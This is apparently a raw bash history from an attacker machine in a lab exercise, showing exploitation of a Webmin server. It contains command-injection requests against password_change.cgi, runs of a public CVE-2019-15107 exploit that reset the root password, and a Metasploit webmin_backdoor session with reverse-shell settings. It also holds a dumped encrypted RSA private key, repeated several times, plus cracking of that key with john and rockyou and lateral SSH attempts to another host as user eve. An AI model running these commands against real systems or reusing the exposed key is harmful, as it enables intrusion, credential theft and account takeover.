curl -XPOST  -F user=root -F 'old=test|echo "hey"' 172.18.1.5:10000/password_change.cgi --referer '172.18.1.5' 172.18.1.5
vim test.pz
mv test.pz test.py
python test.py 172.18.1.5:10000
vim test.py
python test.py 172.18.1.5:10000
vim test.py
rm test.py
vim test.py
wget https://raw.githubusercontent.com/jas502n/CVE-2019-15107/master/CVE_2019_15107.py
python CVE_2019_15107.py 172.18.1.5:10000
python CVE_2019_15107.py 172.18.1.5:10000 'echo "test"'
python CVE_2019_15107.py http://172.18.1.5:10000 'echo "test"'
python CVE_2019_15107.py http://172.18.1.5:10000 'echo "test" > passwd root'
ssh root@172.18.1.5
python CVE_2019_15107.py http://172.18.1.5:10000 'echo "root:test" | chpasswd'
cat /root
ls /root
cat /root/WARNING-READ-ME.txt
ls
cd /home
ls
cd alice
ls
cd ../bob
ls
cd debian ../bob
cd ..
cd debian
ls
cd ..
ls
cd eve
ls
cd /
cd /var/log/
ls
cat cloud-init.log
ls
cat messages
ls
cat private
cd private
ls
ll
ls -a
cd ..
cat user.log
cd /
ls -a
cat /root
cd usr
ls
cd games
ls
cd share
cd ..
cd share
ls
cd /root
ls
ls -la
cat .python_history
cat .wget-hsts
cat .profile
cd /home
ls
cd debian
ls -la
cd .ssh
ls
cat authorized_keys
cd ..
cd ..
ls
cd bob
ls
ls -la
cd ..
cd eve
ls -la
cd ..
ls
cd alice
ls la
ls -la
cat /var/log/messages
/et
c/bashrc.d/history.sh/et
cat /etc/bashrc.d/history.sh
cat /etc/bashrc.d
cd /etc/bashrc.d
ls
cat log_commands.sh
cd /home
ls
ls -R .
ls -laR .
cat /eve/.bash_history
cat eve/.bash_history
cd eve
cd .ssh
ls
ssh add id_rsa
ssh-add id_rsa
ls
ssh 10.1.17.4
ssh -i id_rsa 10.1.17.4
ssh -i id_rsa eve@10.1.17.4
ssh -i id_rsa eve@10.1.17.4
ls
cd ..
ls
cd ..
ls -laR .
cat eve/.bashrc
cat eve/.profile
cat eve/.bash_history
nmap 81.2.195.254
ssh -i eve/.ssh/id_rsa eve@10.1.17.4
cat /root/WARNING-READ-ME.txt
journalctl -u scp
journalctl -u scp.service
ls -laR /root
ls -laR .
cd /
ls /la
ls -la
cd /home/eve/.ssh
ls
cat id_rsa.pub
su eve
ssh eve@10.1.17.4
cd ..
ls
ls
cat /var/html
cd /var
ls
cd webmin
exit
cd /var/webmin
ls
cd /var/mail
ls
ll
ll -la
cat .ssh
cat /home/eve/.ssh
cat /home/eve/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,48A98AC639005A4158AA7B9CEEF483C4
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
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,48A98AC639005A4158AA7B9CEEF483C4
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
exit
ssh root@172.18.1.5
vim testkey
john
wget wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/ssh2john.py
python ssh2john testkey > hash
python ssh2john.py testkey > hash
john hash
cat /usr/share/wordlists
cd /usr/share/wordlists
ls
john
john --wordlist=fasttrack.txt hash
john --wordlist=fasttrack.txt hash
john --wordlist=fasttrack.txt /home/kali/hash
ls
cd dirb
ls
john --wordlist=dirb/common.txt /home/kali/hash
john --wordlist=common.txt /home/kali/hash
cd ..
ls
cat rockforyou
cat rockforyou.txt
cat rockyou.txt
cat rockyou.txt
cat rockyou.txt
cat rockyou.txt
cat rockyou.txt
john --wordlist=/usr/share/wordlist/rockyou.txt /home/kali/hash
john --wordlist=/usr/share/wordlists/rockyou.txt /home/kali/hash
ll
ll
vim ssh2john.py
vim ssh2john.py
vim ssh2john.py
vim ssh2john.py
ping 172.18.1.5
ping 172.18.1.5
ping 172.18.1.5
ping 172.18.1.5
nmap 172.18.1.5
snet-sensor-mgmtman nmap
snet-sensor-mgmtman nmap
snet-sensor-mgmtman nmap
man nmap
nmap -A 172.18.1.5
nmap 172.18.1.5
ssh 172.18.1.5
ssh 172.18.1.5
ssh 172.18.1.5
man namp
man nmap
man nmap
man nmap
man nmap
ping 172.18.1.5
ping 172.18.1.5
ping 172.18.1.5
nmap -sp 172.18.1.5
nmap 172.18.1.5
nmap -p 10000 172.18.1.5
hostname 172.18.1.5.
hostname 172.18.1.5
hostname 172.18.1.5
hostname 172.18.1.5
sudo nmap 172.18.1.5
sudo nmap 172.18.1.5
sudo nmap 172.18.1.5
ll
nmap --help
nmap --help
nmap --help
nmap -v 172.18.1.5
nmap --help
nmap -v -A 172.18.1.5
nmap -v -A 172.18.1.5
nmap -v -A 172.18.1.5
ll
ll
vim webmin.sh
vim webmin.sh
chmod +x webmin.sh
./webmin.sh 172.18.1.5
rm webmin.sh
wget https://netix.dl.sourceforge.net/project/webadmin/webmin/1.920/webmin_1.920_all.deb
dpkg -i webmin_1.920_all.deb
dpkg -i webmin_1.920_all.deb
dpkg -i webmin_1.920_all.deb
dpkg -i webmin_1.920_all.deb
sudo dpkg -i webmin_1.920_all.deb
sudo dpkg -i webmin_1.920_all.deb
sudo dpkg -i webmin_1.920_all.deb
msfconsole
msfconsole
man msfconsole
man msfconsole
man msfconsole
man msfconsole
man msfconsole
man msfconsole
man msfconsole
msfconsole
msfconsole
msfconsole
msfconsole
wget https://pentest.com.tr/blog/defcon-0days-10102019/defcon_webmin_unauth_rce.rb
ll
rm webmin_1.920_all.deb
cat defcon_webmin_unauth_rce.rb
vim defcon_webmin_unauth_rce.rb
help
msfconsole
msfconsole
msfconsole
msfconsole
vim defcon_webmin_unauth_rce.rb
mmcli --help
msfcli
msfcli
msfcli
msfcli
search
search cve:2019
search
search -h
search cve:2019 name:webmin
search cve:2019 name:webmin
run exploit/linux/http/webmin_backdoor
use exploit/linux/http/webmin_backdoor
msfconsole
search
search cve:2019 name:webmin
msfconsole
search cve:2019 name:webmin
use exploit/linux/http/webmin_backdoor
hello
?
options
options
exit
msfconsole
use  exploit/unix/webapp/webmin_backdoor
options
RHOSTS=172.18.1.5
set RHOSTS=172.18.1.5
set RHOSTS 172.18.1.5
options
exploit
show info
show targets
show options
set LHOST 172.18.1.5
exploit
set LHOST localhost
exploit
ifconfig
set LHOST eth0
ifconfig
set LHOST localhost
set LHOST eth0
exploit
ifconfig
set LHOST eth1
ssh eth1:4444
ssh 10.1.135.83:4444
ssh 10.1.135.83
ssh -p 4444 10.1.135.83
exploit
exploit
exploit
ssh -p 4444 10.1.135.83
ssh -p 4444 10.1.135.83
ssh -p 4444 10.1.135.83
ll
nmap -sn 172.18.1.5/24
nmap -v -A 172.18.1.1
nmap -v -A 172.18.1.1
nmap -v -A 172.18.1.1
nmap -v -A 172.18.1.1
nmap -v -A 172.18.1.1
nmap -v -A 172.18.1.1
ll
mkdir .ssh
cd .ssh
ll
vim id_rsa
vim id_rsa
vim id_rsa
vim id_rsa
ll
ssh -i ~/.ssh/id_rsa eve@10.1.17.4
chmod 400 ~/.ssh/id_rsa
chmod 400 ~/.ssh/id_rsa
chmod 400 ~/.ssh/id_rsa
ssh -i ~/.ssh/id_rsa eve@10.1.17.4
exploit
pq5zI0lH1Vf4jlhYpD/PXMmULzR28OIOVrkcUeZPVlv+aIpLd6zbe8mfIEDCzH9G
Q9Z2LPIWU200w5daHsXp/qukKdDn1CB4JinKvtLka3Q4i6EHj+Vp7bvhmFpapjdW
/BXnD+JMm+w9ZTRsHqrXKsAEyVhM99hWoFz2k1s+Q003y/7I/0XmPETD4GJZAfqX
WzolChBDCjWIMZ/9j5JREtzWX3s7+k32TFws/jPKzXEB21M2Szn23pkoXp+zyqT6
bTXmV+hQf+gS7PjVRthqPONau6on19uDDVXNeuVygP4T8H5v6kAurFVX1rvkbaSm
sCLJmNBb/7o7QR1Hhvo7NN1z85CJr9yxC6MqLbbcv91Mhb3w1Ce2eL+QnhgE86HE
I0lvTSHTPFgvw00pV4bypACc28X+0YjRVRFOxqZxidw256pubOjRjIHIG5n6eMYk
W3XiLqeGN7DLwY8X6RXfqafVQmJR6j3zB/PAoSVh25eTQwl2i1rgYzo0IGcdwUxN
KHGCl8kHWe7ks3KT4+WU9uZZAhAECaWJvLzo2Ba6dst/Ke7KEtmGwv5ExUUvfHve
0mt+olWJFSJa072UPuHe7gWdlexqh0l59q4ohOG+zJke1u74Br9wo6KIv54IqGVS
y2O0rVCjsin3d2h9F0Fp0Xvc3EHZD7ct2HvZEV6x3kUlfdWeHKuF+7wUeTJfSmvq
9+LnogQTclKAVk8htnrxBQh7aPLBAyTaXACAL31bB0ZXfh0yhJX6bXIe+EVPNaf6
ssh -i ~/.ssh/id_rsa eve@10.1.17.4
ssh -i ~/.ssh/id_rsa eve@10.1.17.4
ll
rm -f id_rsa
ll
vim
vim
vim
vim
echo "-----BEGIN RSA PRIVATE KEY-----\n\nProc-Type: 4,ENCRYPTED\n\nDEK-Info: AES-128-CBC,48A98AC639005A4158AA7B9CEEF483C4\n\n\n\n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\n
echo "-----BEGIN RSA PRIVATE KEY-----\n\nProc-Type: 4,ENCRYPTED\n\nDEK-Info: AES-128-CBC,48A98AC639005A4158AA7B9CEEF483C4\n\n\n\nPs9uCxB/vjzzEwZU+BjohF/sb/kaa+thfeYki9iFGqVQpHbPhdZU7JO2rKTU3w4k\n\n2OG1q9DAD07fQPpCmX5vqWAdmeaWq//2k3zRVsadFF3daPGjWs1f61j4/JqYBSDl\n\nyeX8g98mtBLBas7bUFuo4jVroEUaoF0fpa0Up+mOAC3rY3tsprpfofQu+uoXaRRJ\n\nBq2CuS5LcqbfVfl9737XeC+DNls/AmkLmYU/1NLKp1hWSpx0/dfJu725tDOtR6zB\n\n9lS9eEPebv4V8mUNU+bsh5YQbVrVmryO9BRLBl4ZK82SO7tnyObpWfsa2jLGg4Mp\n\nN/jFdUnWSkA2wEgzupDZmPU6jyJ/BosOxJVkih4oQB1s9BO+HzI7oA5sDfO/gw1R\n\nBdC2V8RnF8i8gwppc2eenbU/PIdDTu6M2LTO4aAM5wxwKXgkTdJuUxmNH4DCFgZ+\n\n/DJyNP3xqCknFLIVTBwVSsHqnHSN6ZCl8BteFdRsf6kAj6qm1/cAfL73otlGZyR7\n\n5PHI1jf+WoJVaRKQLzFfaMrY0rhU6TsQTYdm2QYcSszE1fhLdXGNKpathYz1sUhe\n\nRPbgJfB0PuzwpzcKesh5j+AnjKQjZcG1vHnrgvDFnd5VNOOrTzdUnMA0DwwVwm2S\n\nvkjUvPbdIkQlNuBL0FWZl/2vHf/xWWex4Q0plLf7lRWJsCDtiKflKHL/SBFYVy0F\n\nTwKMZJ4885lBJfN3AG9kj4azCLK6IcAuRoxTmAtYrntQWLtDCHyaCW6dZItCtQK2\n\npghYqk7inYawVLDG9f5ej+1MYQNfScZYpQ/IEH2jfbRgQsXj7zgtS9ewQoyqBY2o\n\nTC+mWTFkXW5YlN9Bu1uZ2CgYQJF0Dx1ns5x3IeF+U5z56KRqaKFJPfRQgTg62m7e\n\n0v/8aKPlPwfmS28OtxtE96zQI3SAAy7AdwkBepz5Pk9iotqIQPk5fY68wBG67v+a\n\nd712Dnn4OPYaqzMTyWz/dRiWcax9bFhNV+9Gp1OoA7hhBO5daLoul3EYx54vd8N3\n\nqJkjc4ljMYr9wvRRcWEhlvQV6LTk2FiYOY4tjRneLXMfsb2BUwSFDXDwDL4zVF5X\n\nrk6oUkbp2aFy5SgMwdlm6tc5sHVHVOLTfeyv7AvRUOaGXbbrUBw1rxgswjSO4V5q\n\nanC3ZW1EHY/nUmSq9myKG5rPdgFhqx7lPBb5eXSGcA+rFkxkQwbtROw73mu00IXl\n\nFKuYCbpmfnY0ZBxR9NVh/kRpv5VI013Mwqk2lcuJTc+mjlHOymyXAhY02j218KSm\n\nTleEMFlW9oXD56B21kVdPDP9McdLgC9//2pSh8sI5kJEsNd294g8ju/dDNC5kybN\n\naqa9d+Nsbodr90LgBOFRdtxUeYihXLS2ZfXE5wYfTwX17ZIoFLuYamE6Og7AllVL\n\nuSoF68eAZXd6R9bL03s9HQvGkSZv8zaFlmK4wRVI5frYMlU5gzD5E/e6Id5X7uCQ\n\npq5zI0lH1Vf4jlhYpD/P